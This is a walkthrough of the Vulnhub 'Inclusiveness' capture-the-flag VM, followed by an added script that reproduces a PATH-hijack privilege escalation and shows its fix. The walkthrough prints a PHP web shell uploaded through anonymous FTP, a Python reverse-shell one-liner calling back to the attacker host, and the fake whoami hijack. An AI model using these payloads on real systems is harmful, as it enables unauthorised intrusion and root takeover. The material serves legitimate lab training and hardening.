Vulnhub – Inclusiveness Walkthrough

We start by scanning the host on all TCP ports, with version and script detection: nmap -A -T4 -p- 192.168.1.10 -vv

Then we brute-force the web directories with dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt

The robots.txt file:

The response for robots.txt depends on the browser's User-Agent header, so we can bypass this by changing Firefox's user agent, following this article: https://www.howtogeek.com/113439/how-to-change-your-browsers-user-agent-without-installing-any-extensions/

Now we reload the page in Firefox:

We open the path /secret_information:

The FTP port is open, anonymous login is allowed and the share is writable. We can log in with anonymous as both the username and the password:

There is a directory pub that is writable (and executable), so we can upload a web shell there to get code execution on the box.

I uploaded different ones and then I got a connection:

Inside shell.php put this code: <?php system($_GET['shell']); ?> then upload it to the FTP service. The command to run is passed in the shell query parameter, so make sure it is URL-encoded when you call it from the browser or curl.

As we can see we have command execution (the output of id on the target). Now we can get an interactive shell with a Python reverse shell one-liner, after starting a listener on the attacker machine (192.168.1.11) with nc -lvnp 4444:

The Python one-liner (sent through the shell parameter of shell.php): python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

In /home there is a user named tom, and his home directory contains a binary called rootshell. When we run it, it checks whether we are tom or not.

rootshell does this check by running whoami without an absolute path, so we have a PATH hijacking situation: we put our own whoami, which just prints tom, in a directory that comes first in PATH. In its simplest form:

cd /tmp

echo 'printf tom' > whoami

chmod 777 whoami

export PATH=/tmp:$PATH

echo $PATH

cd /home/tom

./rootshell

cd /root

cat flag.txt

echo $PATH only confirms that /tmp is now searched first. When rootshell calls whoami it picks up /tmp/whoami, which answers tom, so the check passes and we are dropped into a root shell, from which we can read the flag.
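To see exactly why the hijack works, and what the fix looks like, here is an added example that is not part of the walkthrough. The real rootshell binary is not on the page, so the script builds a constructed stand-in that performs the same whoami check, plants the fake whoami as above (in a private directory instead of /tmp), and runs the stand-in with and without the modified PATH. A hardened variant resets PATH before doing anything and compares the numeric uid instead of a name returned by a subprocess; the expected uid passed to it is an assumed value.

```shell
#!/bin/sh
# Added example (not from the walkthrough): reproduce the PATH hijack against
# a constructed stand-in for rootshell, then show the hardened version.
set -u

WORK=$(mktemp -d)

# Constructed stand-in for rootshell: trusts whatever `whoami` PATH resolves to.
make_vulnerable_rootshell() {
    cat > "$WORK/rootshell" <<'EOF'
#!/bin/sh
# Vulnerable: which "whoami" runs depends entirely on the caller's PATH.
if [ "$(whoami)" = "tom" ]; then echo "access granted"; else echo "access denied"; fi
EOF
    chmod 755 "$WORK/rootshell"
}

# Hardened variant: reset PATH first, and compare the numeric uid ($1, an
# assumed value) rather than a user name obtained from a subprocess.
make_hardened_rootshell() {
    cat > "$WORK/rootshell_fixed" <<EOF
#!/bin/sh
PATH=/usr/bin:/bin; export PATH
if [ "\$(id -u)" = "$1" ]; then echo "access granted"; else echo "access denied"; fi
EOF
    chmod 755 "$WORK/rootshell_fixed"
}

# The attacker's fake whoami, exactly as in the walkthrough's /tmp/whoami.
plant_fake_whoami() {
    mkdir -p "$WORK/evil"
    printf '#!/bin/sh\nprintf tom\n' > "$WORK/evil/whoami"
    chmod 755 "$WORK/evil/whoami"
}

# Run $1 with the attacker directory first in PATH (export PATH=/tmp:$PATH).
run_hijacked() { PATH="$WORK/evil:$PATH" "$1"; }
# Run $1 with the caller's PATH untouched.
run_plain()    { "$1"; }

cleanup() { rm -rf "$WORK"; }

# Stand-alone demo: vulnerable binary falls for the hijack, hardened one does not.
make_vulnerable_rootshell; plant_fake_whoami
echo "vulnerable, clean PATH:    $(run_plain "$WORK/rootshell")"
echo "vulnerable, hijacked PATH: $(run_hijacked "$WORK/rootshell")"
make_hardened_rootshell "$(( $(id -u) + 1 ))"   # a uid that is not ours
echo "hardened, hijacked PATH:   $(run_hijacked "$WORK/rootshell_fixed")"
```

The two lines that matter in the hardened stand-in are the PATH reset and the uid comparison: a setuid helper that inherits PATH from an attacker-controlled environment, or that trusts a name string from a child process, is exploitable by exactly the steps shown above.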
